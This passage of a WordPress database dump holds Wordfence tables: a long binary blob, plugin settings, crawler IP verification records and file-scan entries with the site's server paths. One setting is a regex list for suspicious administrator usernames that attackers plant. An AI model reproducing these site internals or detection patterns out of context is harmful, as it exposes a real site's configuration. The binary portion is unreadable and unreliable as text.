4h\"hAD\'\'|6[kF=\nyifmR̗Ui؜!YhLa门b|\r,7@ \\\'>0n+SK& sщ\\;Yq9wm3t ЫQv#`i-1ٞUhܑǣg\n4 ]D$WܗEV8֋i;fe|ˤܝ.rYMDMKqĹzZpܣxL#!E~p#wp1[0L \nܱfXI`&:=^bKG\0.ܴ&#kpe`򷪱hfsIXNkǗ!JB(AL.V#8de\\B_&:K:\"‡$_\ZgpSI{ǫ2jPfGi+YHK׀&f8Hk[%mrŠ s+n0Of֠7y稶\noN{mnP,h+p]h4g\0x-8EmbE\rH Zm\"6N`! B\'wCˮ.0{\'~K.s JIPګ&nR 2JX}k;\n5 Vr4݊w?œL)Kf4ٺ\ra~tnTݩzKuY.mi4*UTݴ \"cYO|D\0;.Ѵ*NݴKbT 3y*נ\rFݿp\\/h#]\"\n=/ MZփI33unM5Kh&bV\\%Z$iC1~s\\6rۘ\nΣ6tt|hfS?f_z`y(H2\nyπ8FpBkʫ.E\"y3(ɝO6Su՛Z&S, p\nb!s!ͮ]>Tx{\\7RAg[: c\nOj5RLCIeỔJe\0.SF>.wg:$ \Z V8{V9/jzbbhF+\0~XtǞC{%f\"Z_m=Z>D[{/m9qN9wN|\n֥sj*b TO5pp`)ޖp1iМ &19ޠ}D3̲ޚ$>*~wa\rxޥ\\}9QZ\rHO\Z+C3\r͇q,ޱ\n1$d8v^!*3#͜v@3&hN;yB\ZN 8 jxoXQl~?8ii8|Le\\UӷHYQ\'\0h$z%ι|qI_y:&Rz<OT%x\Z܂it11EgU&21YI\nf YᦊFrL7uSt֗pǯ$U-m ~V>򘀹EY\r,iՂ!\r2nD9T%T֖\r>ƾAY{,P\0~b\"܃n\0A=Rb$=Otǐ>G8jj48-sZԏsŝf?߅yRz5T\0DU磣 w̯ߌ\nrsgɴ5Z}̼ߌPܻ\0{QЩ#m,x\\`ar_ߔ}>&Iy pby18gJ\nߙw, sƟlalkHJn?&b+ߠB.qf6*_-WI4K2ߧ)sg,He|\"j̋2(߹VNA=X\".\nŅi2~<gqԴTϗ~%>ԍ6m_5};[IFi|x7N*TZj\ru^kbڵ)P\0[\'.l7^\r?%RcIglQRx\ZˮR-SZo3ҳCAj M^2ɖ އ͘RRSo sByc!l MJh^`7Z=^ԯč1TgرDwh l ԑ_x4\r[ \r+~\"j\\粃h_EV\"R҆c}oiӿFp&KIPʽD[E=3iJ[ax(aBtgP B\"ೄ\"-dJ ի U{(QG<C]Ffw\' 欚Evm8aĆJHڢ #eR7\"d#!E!,cl 5B\\ W\"gܷ}}|CC0v0K\r-p4,KY(I xDQ/tvǹU8&.aYA=6 ݼ4\0e0-4J\0)Sִ ?k\"4Z.Z9\rkXe_^q(ѵ/̹h 22&Xt-aZnmsNQ\"?mFN8?pi\ZhHz᎞O,khiYe8;w*Aފ&\'D:5`v>dk}<6 ,?nі@(ü^k\\cȀKB۵&|UB\0Y;@7GJ۽揷+I-i3a%+eT7 ҧgяd,w= {|\ZZoϢ.p]U\ZeOlP&A{5[8#=G{tj\ZC`qR%D\"/w?Z)H%K-xrNpꔨ%\r/<\rgl+Q_r-mPhQ$,5%m,\nu(ޞw0KoHJ, a rU9\'s?| R0AtRWE )օuTRYT6r\ZIZ)[w[]=`LÞV GLmJafo\0We2`:Z?^X=Gγb<H GwE21wha3(J@g)z럳9=8\'KI\rn‵`iz y}fWmhGmM]H\ru:4̩i7[G쳙r/a4v)w}U+谆{3⥾ϵ瑉N)]W1+Z *ʠu<e\n,&ͭ1:If ڦ%5@Q85ʂ1-5ymn*$ \\lG*EM\nl׭m[-B8YٺdJ6S.V594*fH r*\0Y㱿;+ hӯ\Zz?<^޺%8\"yٱOlB=VGh!K<Jq;(5nOjnYZ5qPܠ4zgzBtWnW&c\'J@{Trq *kJ+0}VLf6 ӆ`lI*H?6G}hoB  %L@ĥbu(FHP\\ȯC9!cnN*NJg}Yv7Oh%.\"AX*䯂:roO\'7x9)yj?wk6(.Tv̯15Nb7ٳUw*)h +ڞ\n)QNkU4JM\\V^1urYޥ1mwt&Cr\'BMFu\Zx/D9 zH&U>+TKF(,`:7QDZ-FZ QTƷn\r{vAH\0eq$WDjK+{jPuυ~\r|FSa(J}ȟA\r1Pxzuѷ;gtS7Gn+Q1rgQ yg5.hfhm;k W8ˉntAbyMϐ;(uj?]$C&eZ%,zfw#nؔ50D*/rxPb=-.XTYnPgb =#\0M)B\\eCAwwKHY\"0d ~k:\nYïy.5 <ooP?DO%ڵN:({Z ӌUJk#HT]^U\0Tj崠&Y|sk<vd_Ba\rc;pvgm-,_\"TP].힭j8\\3c\Z^@i# UcjHq.!۴ ^U\rs&z\\LKcu[;m幡F}I-6 n$[$\n 92%V”0D2`qT&%q5y\nVڌHt:@-= g_{-SP+fQp87i!*Iȣ7\Z, [xR,96g\0È];l\0l*\r\n%E\'tF䝆煶\Zf=?;[%j{j Ma7 895p(\n±vJJ|5:Jhroثl]FA1_ \n!痰fWeJSZwkXڱӍ~\n}@=\\YYC]Ǣ5 cZ\rl Yƞ[#i[5Жг4\02m&h`q\n\")\n Se]~&^vwŜv|چ`z`I{zC9]W9Ջʸoz=pr7 ά49E\Z\'x$񯏓\0H\n({S=g‰kyo?8Շ|BD137ţ遢\n踭,\\qr*Llf< *0V\04~tUgLQ磺1Zktx*5Iq*lmKңk\"MQ?pa؂4鄳~㾥ݐnn\'-҉V>鈢ڛr],?i(R;}>QV!yvpc̒P`-e9rJ K\'t>;髥ħgZCJo*^ɰ1NJRiBOӬBVhpC%Z}=s<۔[Z# g *\Z;1\ZE?Ic_c#ňM-[\"/$nE*9p:cZT\\:_&#`Q\n. .E@ю.%Eg=N3>g|S(FjǕ\n;eX4PievWsoڋLQBWbex Aj,prkjVi]A\"3#q Ɔ\Z)+l\0#<9\"ϕAvhzJ>AqW&zUV\nW8 `\0ayxHõנcΏͿͰ9O8^^]t*f%YE5<`Whj0g_MTJ\npc‰[_:E(.)&$*~(gf;c\0̢ce:Hb>R@\' =v@5) y&֫\r;&؛ƿػ5|V{׾A\rreAF zK`\"?EzcRz͞.V~!6k8W\'|ǘrfH /@\':{YT3NZOQ˶ܩ8N?5nA.ya餷#c^SA_7\'hcv]#\':zKl?Yk2W>-MPN`g?\\\n \rK\0J<ǘ3bxT:W* r-6fpxc,hoNI[\\`nB7$·#t\"Sm-C`ɊsE#)(A[h\'|kaOIh9A\08(?K\n͠ZNtaZf+Ǡ\nKbn81\"P&8X;U^LDL94ݬJ݃ClEe[7NJtt@`2Z\'SV\"*XAvkOxޡmdFFÅfa+6)rb4ʲg}Sxvֻ aʩD\05SS-*^Ӆ\\wꅱ/Y6_wpkw0%`0vl\r\n?4ɿr֍On_4`/-\'aYI|6`Z4\n\"l\'U8ykSlصA(GL8!rZ!e%duH/l+ޠ.I6( 웎yRj\nMx\r.s΂&In6_ga8y].^5Pn>:,GIzR쮝yY#dzE 92 vnjs,_Y{\Zk]ٛzJ^z{M9l+:A}00.@L3l囔\\HiܵxfLl#@Ťe+׹=So\nhѱً!J~ẞǡɹὙ g\ryuCx;P{ kyM#h.?t#ɠ\"z)`RI+_#ap[o|\':@A} E饬 2,)w _DʉԶ͂6j40FSc\"~G8<\':M6/U9)OWT>S0\0;QO%$K \'͕{)_ĝ#/q&O[ O\"²,l?2j&,k$t3?iYϲYڷO5]I{ٚXLl#,\nWMbXzp)\'F{Pniq9o ̳l5y9Mb&iKues<%qѬ6IF_\'Q73#5XNxL+֖} gTj,)0 f;7p>Dy(-s\'#֛XމΆ>풏9Fܐ𱐠dְH]@ePayŝ&)ԧ0x)/mۅrUz&[j}wREv{AG5Fi y*dq]OX=ܞ“W[B\rDݬvp>j*욬e 3p]L}``DX1عWJ]cƈf uJ0fj\0ցsZR~]*\"rdS2!{֣:=Nzg&$F,lK급/Í9zÜu\Z\"dm*\ZX͹[I|4r_xS *t^&/\\$r\\`ʳa7%eűCS6ǀh2.^WwHî4n~2p{wq\Z.(Wa_NCnd,ypU~2ʩw:jU/t#L\"utPw\"Lx|(.ayѫu#\ZڄeuuI;o,1{[rѸ5b,B2+YGHQMp+i2vCm*i QLCH8RvJjo޼f2RFt { [Ob4?fs^Y\0 ^x{N0GuD/Sā;%mp2X[j_aGv@2b\\\0~*JjT\Zw?/cg)eZ~&qN7 Z-r$E\Z3b\nNyoHNmQvaN/ Y!v46]3]3<ڗ<*=t󅡢pEKL[Mrx%\0b0qqĂ|x:_V5:USo2ҾPuA_*}~\'K9;4p\n+=UO}6Ԋ|}<yﭼ։Khxޫ(R1=~PwºT+In\r{M_໘`3x4L#\\rԹF \"$qc@\nCKnA O] `oCK.U8uiH< pShZذ/\r.O}9fPko2,=A}P#\r5k,PD+>J5딧n.\0URqk\'i_i,\nG+L.\r Q\0% \'ym_#?E1\0² 75mw>Z2Q2K=^NqQ\nIS}V#N7=ɷ5gD>h]3\n0_эWg1*VFIPxfvL@pR;KR[:[*w(1 yjL3ˇd\'V&}l]dOgV:5fHA~l!/6yԶ![^IٷO3E}{Yz#@XaͰ]()ck!~s~hq0X?8̅Hi,+x ͵ SE9r=#_~\\/Sͻ(YC/#/D^>6\\V6 Ei*X,/6}%]v \ZY <}]8c4=}Xj( ;wgָ,\\R0$koA{2#am\'Y#O(&\r\n0{z 7jRv^0?2Dh4SG8RHe|5/iVV#VA`4ډ3z\ZrK,IޗOexџi}.kQ _39y\nb-5c,R3\'r.]9cxߚY9\\~ fǶhj}upIXpھΩT/6FkTE;H #ߛ{C\'Vۨ/H_n{FW?^ծV N -js\Zjh߽CșIER1GŸċd/8Z{{S*QbUa9e׽RX?楐1ih\ZҕXT9Eߎiц k!PBxQA.Tۄ๠ێv&=GVkr2C5m~q~ ;rfXᅸeXtŪ.+[咩H{v./s|UZ Ah$DUsI{\'\01rkDac#kQbm(({ia^\\vJMC`QA6_~jc,1F\n)7䩾!@ nK^$NVjq`JBZޅJX0u9>!v1vą>Ш&D6X]`=s\01y5z4Oš|pA5P%Mu#g]zmܦ8u(fy2Э9exkzB46H y/=u4_c ο\'M|4gE;+\\)Hq{@dX{a2H =G6Cm:|!%p8Ug𿌫ANyqoʅ#&]#mVەrȹL=6mzQhZC TαiߠPom\\D5~!oa[ceU>Tø~3$:ЗeW_6|T->{rC\n=kRdj6T\'ta\'X%=B-Ep~\'u)3H_cxNpnx{V@f!D.SJ/xknZ~q6Lꂨ$?{II%&V(Aw<䩻c$a=!3CPY.c%0 b?O)Mퟴ[%>xd]?Z񴝞15q)9W/`kWV*_i_\'hMaCQW~K0X~D<>5O! U\'IaӴ9+6fF7r,?OP\Zr(gau;YR>v\\?sk\\ ~mV|ݐ\0!ٖX6av/%1UEd_w\'ޢKGs* %y1PbBR[B}\n[; I2q U>n)̈́IxVV$Z=qUOc\n4\r\'R28F(>F2 \"Qj6h\'Vh~Ad7DcA\ZHzyIQ]o%:1WRͩQi~^G7p/+\Zz:MKpo*ATڌ̄ʟ[wTy61?\"pL,vr`G̃S$ 2|>YwMW[ I/H-j\r%D+P4 g.{^W/!uT &gɖ\r.:)Q7ݣ h\"bY(VW|/5[rɷ*MlrnzWm:fO&y(H\n#_FD:1I}U\"\0HB&`8m!Uc%rT.qx=\0\"I8c_;k6RrE?{dG_A7c0+^Eh1{9U,%k1X \r LcN; ]ySPk=9ifCu l6E#Zt,#<\ZL4ZFU!}\\֊_ȕ o/B\\!Z<&^SV?RÊ] U@qZ\Z7BIͮ6RԤz8\\4wcysM)9@2.V/Bc5a\rRIG>?y;+\'SAED>qqa_؈K)A,7q>d\'@@x°E]|/YQ;#6ycȌʗjL2-[ 3]S.\\0הB/\njz\'aFL\ZH-L `$p1/>:rVǙ =={OrRxgJ9G0>zc& IÆb4~*LQRkg! ifnb.*η$gwT #;?`?;\"AY|X;uaw?oabN$gI+R.e\Zpt ᣈ:\Z`\'8y`wW0PRƇ]Pd$*H 9\n?g{g s gOXI#n!F#Yȼv\"|:ݯCG#\nYE[Vwi%-%F\0[n1Sa+]BE2sŎ)?ԟB *ZOےn+z`ߗ]^$dgGfmG8@~n? x*ՑxkS략9URݼ\"EI {`z$쨀qZ6hֲCR=8Hΐ<>yy= ؃Gө&0*u\0u\r+M\nMƿ4f_MG%2q0/ғ:;eWGʈP,KA]H%AQ<!B|$k݈# ei%0D۞V蚹xRBBy%hWvǶm}nG>pѹW5wOE̾mG. Ճg?ƒrТjs$_D&֗H᝭s%vx-#? T5)\\Np[>&]:.ѥׇ4UhnlhʫjF**\ZWnfrP#3w֢$¡桘3D\\[IwD=O$l\ZI9<0ox>L1\Z?f] t2Ј5Iv C(߱wziC\038\'U$S(]4PcUv᢭(c̈́ɯTνڐ$_SЊ||nD~v-;&W0;7 \"L~ޅLE`!)lʛhLO/̩3z4ΚC:Ufz^^Gn/pR1C̬202J΍<:_B!s*l6\"Q_ȹ2a7<\\U}\" As?C9`r0É\01yiN7,N]8ϪC,01Sͭ-abpYx{VcolNGqlkbañԟyb@Y(J5}׸dt`MuƂUz[w\\=ʼ\0[\nKix-b>,EdҔ\nN-\09pM0+~0:6r½c h{M\\J,k\r?O\Z/ކf?xȃ9\rQP@\r\ZSz\nEOwF.P)n><WS)_]Ya\'kY_otr)CEI m/;ggŭƱ0`8^\\Ƌ~~J7$kSsYme( |.ŹzZ[몾lc읋qoןK֛+%؂!a29\n `F_h*y.ZۭP0\"j=xat\\Kh9wǏ;Z)K~Q[::js^Z@2nve)e_u!9]we<΁iJkNuMٍOI0x{MyR\r~SBSThZs*[? POvDŌi*b*;ةDڨn/NI}7+ƕAl欿Bt\'st shwk1]\':&etbt*\n\'Z%$^*BR_~;A k8\\=>J1~(Acqo%TFO-GzJTN>\'#. D=a:\'jK WHS`\ry~E~|\nRi)fl饔e})ld*ÀIF^ȯܒW@~ݘT`l 9睪PkKVd*X\0MoDO=hW\0 7$RTbzHpf?@јݲIG]qM;>l\nA>khR8yOtldU^E%On޹~}J[An>P:74iwqcs @\"/š|sP|0ô!J[h7e^JTuVڅ6bJR#ԲYunnO#\rF1_Ң\'Sz< J8@bc\nizNy׊}˜.\Z^*̶=.)~ _OP\nx+U1wz)\"4+B\\II%%\"ЖX~X4;;]* &\"TQWvRid3m`a3\r45q$&Β9QO*zkBjdE,TgOrP~tgn g(W{v^Z}ȐC6ݞ+?۸ZPd?P\\ kO}H\"F+:̵LZKAry9H$Ī50K5:\'Ċ$Ժxr^/\'D~4d `8`q׆dŪC*k]0ɾ\"Ͷ#8Kr|\Zゐ5bT2ph= j#jR 𪏨|z03ܸOV1SlfwV1 l?.\rƨ;p-e*`[p5Uͳ{n!z[>ft4s^tE+WLկCҩχHhZ;P.s.1q+܋\r4$PduU18<KnspGRb:L0j}y슟WSh5GH;V((\ZB\0\rlŗBs#3?+WpPMk]NcVMTpW \r0Z|\\T-B D\",Quܳn.A\ZXm,P \r JhxQ#\0  tgFNv&W\"IJ}:kS-e&sc1hؗ]m3ĺXqÏj_y[+xEV0z xi\nF\n74欋\\M=Oh=ln&ăJӗ ~lL;-F\0U*/d.>z_MEMՏ-/v_څc?,U&\"R[R|Lkv7[ׇd̂zR<2K7II !1&j[656i8ntl*?/]\Z4tX*52.p·\"F6Zؙ\n$zz\r9`\\&S9~{-LKŝITi;u!7UeH> -%G(m\0DO;^Klظ!/?aFz#U%f{xi<f;KZ9ްNWj_H]͚VIR[냛BwsbN}qY7zoUu\'1k~P,o ʂ -~Bʾi>1/##yXoa\\DŞhebh?)31us_sШd>V*R/\0ӷ~r%\"8lb κ\"7eE=n~͙\'2C/ r\r̈\r;JUˑ-\\B? CQc2 Gehh݌^@˶\\},nۛ~AF,\"Ǣ@\npy4&7:wOh4jyD{!2_Ud~p7O\";}\"20\0','no'),('scanFileProcessing','','yes'),('wfsd_engine','','no'),('signatureUpdateTime','1704315567','yes'),('suspiciousAdminUsernames','a:2:{i:0;s:46:\"/^wp\\.service\\.controller(?:\\.[a-zA-Z0-9]+)$/i\";i:1;s:55:\"/^(?:wordpressssadmin|wordprestadmin|jaime.besser56)$/i\";}','yes'),('adminUserList','a:2:{i:1;i:1;i:2;i:1;}','yes'),('totalLogins','22','yes'),('totalAlertsSent','22','yes'),('lastEmailHash','1704449922:f1387adb375edbc8d4664753c607c49c','yes'),('lastBruteForceDataSendTime','1705040172.952900','yes'),('wafStatusCallbackNonce','','yes'),('autoUpdateChoice','1','yes'),('lastDailyCron','1704989096','yes'),('disclosureStates','a:1:{s:26:\"wf-scanner-options-general\";b:1;}','yes'),('apiDelayedUntil','1698734194','yes'),('wafAlertLastSendTime','1704449922','yes'),('lastPermissionsTemplateCheck','1705033110','yes'); /*!40000 ALTER TABLE `wpvt_wfconfig` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpvt_wfcrawlers` -- DROP TABLE IF EXISTS `wpvt_wfcrawlers`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wpvt_wfcrawlers` ( `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', `patternSig` binary(16) NOT NULL, `status` char(8) NOT NULL, `lastUpdate` int(10) unsigned NOT NULL, `PTR` varchar(255) DEFAULT '', PRIMARY KEY (`IP`,`patternSig`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_general_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpvt_wfcrawlers` -- LOCK TABLES `wpvt_wfcrawlers` WRITE; /*!40000 ALTER TABLE `wpvt_wfcrawlers` DISABLE KEYS */; INSERT INTO `wpvt_wfcrawlers` (`IP`, `patternSig`, `status`, `lastUpdate`, `PTR`) VALUES ('\0\0\0\0\0\0\0\0\0\0BB','>b0oQ1','verified',1704900083,'crawl-66-249-66-139.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0BI','>b0oQ1','verified',1704814275,'crawl-66-249-73-193.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0BI','>b0oQ1','verified',1704812443,'crawl-66-249-73-192.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0BJ#','>b0oQ1','verified',1704808981,'crawl-66-249-74-35.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0BJ)','>b0oQ1','verified',1704803593,'crawl-66-249-74-41.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0BB','>b0oQ1','verified',1704794039,'crawl-66-249-66-4.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0\"','i| OoD!','verified',1704626248,''),('\0\0\0\0\0\0\0\0\0\0\"','>b0oQ1','badPTR',1704626247,'ec2-34-241-27-229.eu-west-1.compute.amazonaws.com'),('\0\0\0\0\0\0\0\0\0\0a','i| OoD!','verified',1704608771,''),('\0\0\0\0\0\0\0\0\0\0a','>b0oQ1','badPTR',1704608771,'ns3195416.ip-188-165-200.eu'),(' |&`%\0&\0\0\0\0','i| OoD!','verified',1704589501,''),(' |&`%\0&\0\0\0\0','>b0oQ1','badPTR',1704589501,'2001:67c:2660:425:26::281'),('\0\0\0\0\0\0\0\0\0\0BH','>b0oQ1','verified',1704544031,'crawl-66-249-72-4.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0BH','>b0oQ1','verified',1704544025,'crawl-66-249-72-5.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0BH','>b0oQ1','verified',1704543962,'crawl-66-249-72-6.googlebot.com'),('\0\0\0\0\0\0\0\0\0\02','i| OoD!','verified',1704425577,''),('\0\0\0\0\0\0\0\0\0\02','>b0oQ1','badPTR',1704425577,'173.208.246.50'),('\0\0\0\0\0\0\0\0\0\0BB','>b0oQ1','verified',1705057500,'crawl-66-249-66-6.googlebot.com'),(' A\0\0\0\0\0\0\0\0','i| OoD!','verified',1704960514,''),(' A\0\0\0\0\0\0\0\0','>b0oQ1','badPTR',1704960513,'2001:41d0:2:a1af::1'),('\0\0\0\0\0\0\0\0\0\0BB','>b0oQ1','verified',1704959941,'crawl-66-249-66-23.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0BB','>b0oQ1','verified',1704957092,'crawl-66-249-66-136.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0BB','>b0oQ1','verified',1704900073,'crawl-66-249-66-140.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0BB','>b0oQ1','verified',1704891971,'crawl-66-249-66-141.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0BB','>b0oQ1','verified',1704894912,'crawl-66-249-66-137.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0BI','>b0oQ1','verified',1704852419,'crawl-66-249-73-203.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0S-','i| OoD!','verified',1704846452,''),('\0\0\0\0\0\0\0\0\0\0S-','>b0oQ1','badPTR',1704846451,'ec2-3-252-83-45.eu-west-1.compute.amazonaws.com'),('\0\0\0\0\0\0\0\0\0\0BI','>b0oQ1','verified',1704842868,'crawl-66-249-73-199.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0BB','>b0oQ1','verified',1704788639,'crawl-66-249-66-135.googlebot.com'),('\0\0\0\0\0\0\0\0\0\0BI','>b0oQ1','verified',1704842866,'crawl-66-249-73-200.googlebot.com'); /*!40000 ALTER TABLE `wpvt_wfcrawlers` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpvt_wffilechanges` -- DROP TABLE IF EXISTS `wpvt_wffilechanges`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wpvt_wffilechanges` ( `filenameHash` char(64) NOT NULL, `file` varchar(1000) NOT NULL, `md5` char(32) NOT NULL, PRIMARY KEY (`filenameHash`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_general_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpvt_wffilechanges` -- LOCK TABLES `wpvt_wffilechanges` WRITE; /*!40000 ALTER TABLE `wpvt_wffilechanges` DISABLE KEYS */; /*!40000 ALTER TABLE `wpvt_wffilechanges` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpvt_wffilemods` -- DROP TABLE IF EXISTS `wpvt_wffilemods`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wpvt_wffilemods` ( `filenameMD5` binary(16) NOT NULL, `filename` varchar(1000) NOT NULL, `real_path` text NOT NULL, `knownFile` tinyint(3) unsigned NOT NULL, `oldMD5` binary(16) NOT NULL, `newMD5` binary(16) NOT NULL, `SHAC` binary(32) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', `stoppedOnSignature` varchar(255) NOT NULL DEFAULT '', `stoppedOnPosition` int(10) unsigned NOT NULL DEFAULT 0, `isSafeFile` varchar(1) NOT NULL DEFAULT '?', PRIMARY KEY (`filenameMD5`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_general_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpvt_wffilemods` -- LOCK TABLES `wpvt_wffilemods` WRITE; /*!40000 ALTER TABLE `wpvt_wffilemods` DISABLE KEYS */; INSERT INTO `wpvt_wffilemods` (`filenameMD5`, `filename`, `real_path`, `knownFile`, `oldMD5`, `newMD5`, `SHAC`, `stoppedOnSignature`, `stoppedOnPosition`, `isSafeFile`) VALUES ('wi.w(M;0D','wp-content/plugins/akismet/.htaccess','/home/tummmyov/tummyrevolution.com/wp-content/plugins/akismet/.htaccess',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2SN%LwO','pľX|lև jYa$','',0,'?'),('I*:o','wp-content/plugins/akismet/LICENSE.txt','/home/tummmyov/tummyrevolution.com/wp-content/plugins/akismet/LICENSE.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4MiHjJBc','\0v1sN>cID٦I0-','',0,'?'),('|ߘ/ ~V_E','wp-content/plugins/akismet/_inc/akismet-admin.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/akismet/_inc/akismet-admin.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"G ˏ','ZR*-1z),2qV,[+0t','',0,'?'),('\0^m#Kg 4F','wp-content/plugins/akismet/_inc/akismet-admin.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/akismet/_inc/akismet-admin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hA(KlnH','>#ApGKܤ?0iIx3','',0,'?'),('MESD,:z','wp-content/plugins/akismet/_inc/akismet-frontend.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/akismet/_inc/akismet-frontend.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B(YAg@D','ݥ1:;\'1skg0&c5h','',0,'?'),('L\rȦ:nh\'','wp-content/plugins/akismet/_inc/akismet.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/akismet/_inc/akismet.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+`s@lJm','VPHu(~An_Q~ᙵ\0e','',0,'?'),('̽ X$oB','wp-content/plugins/akismet/_inc/akismet.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/akismet/_inc/akismet.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yL*bu>}','߷F\n [ܲ0eK=|&','',0,'?'),('&ٗ[zr`%Ō','wp-content/plugins/akismet/_inc/fonts/inter.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/akismet/_inc/fonts/inter.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&WD}a#DHJ+','Bgaf`%2)!;\'pCg\0Ev','',0,'?'),('cu2gՑ[3+','wp-content/plugins/akismet/_inc/img/akismet-refresh-logo.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/akismet/_inc/img/akismet-refresh-logo.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b\'h2 ~s','mRzтq>kK 8glo@n','',0,'?'),('2&qעųV','wp-content/plugins/akismet/_inc/img/akismet-refresh-logo@2x.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/akismet/_inc/img/akismet-refresh-logo@2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' Fx풹AȊ','K(Xxہ. 3,\ZFy#^y\n(LV','',0,'?'),('IIb^y$v','wp-content/plugins/akismet/_inc/img/arrow-left.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/akismet/_inc/img/arrow-left.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^]P9KG','J;װk:}u>k@F','',0,'?'),('xmY\r=P9','wp-content/plugins/akismet/_inc/img/logo-a-2x.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/akismet/_inc/img/logo-a-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','wJZ>',' Jz{M\rR怮lBA\rU¨','',0,'?'),('\'PT] 6~','wp-content/plugins/akismet/_inc/img/logo-full-2x.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/akismet/_inc/img/logo-full-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^K-^>As{','%>:1WRͩQi~^G','',0,'?'),('-h%Uf}','wp-content/plugins/akismet/_inc/rtl/akismet-admin-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/akismet/_inc/rtl/akismet-admin-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$,KA $','zB4p*\ZCFPrs#K','',0,'?'),(':$d4','wp-content/plugins/akismet/_inc/rtl/akismet-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/akismet/_inc/rtl/akismet-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#5\";','CC_p `00GސE40Ĵ&z','',0,'?'),(')̃2kh! ','wp-content/plugins/akismet/akismet.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/akismet/akismet.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n u\nzI','M3 &C?SО7IwrwPaU','',0,'?'),('U)ʀ3G','wp-content/plugins/akismet/changelog.txt','/home/tummmyov/tummyrevolution.com/wp-content/plugins/akismet/changelog.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y2}9','LIn*(2bnĄLv_','',0,'?'),(' jK&Y','wp-content/plugins/akismet/class.akismet-admin.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/akismet/class.akismet-admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ;U M?','e\' uHɵjxLB{#*ړ','',0,'?'),('f餧xMP]~B','wp-content/plugins/akismet/class.akismet-cli.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/akismet/class.akismet-cli.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z 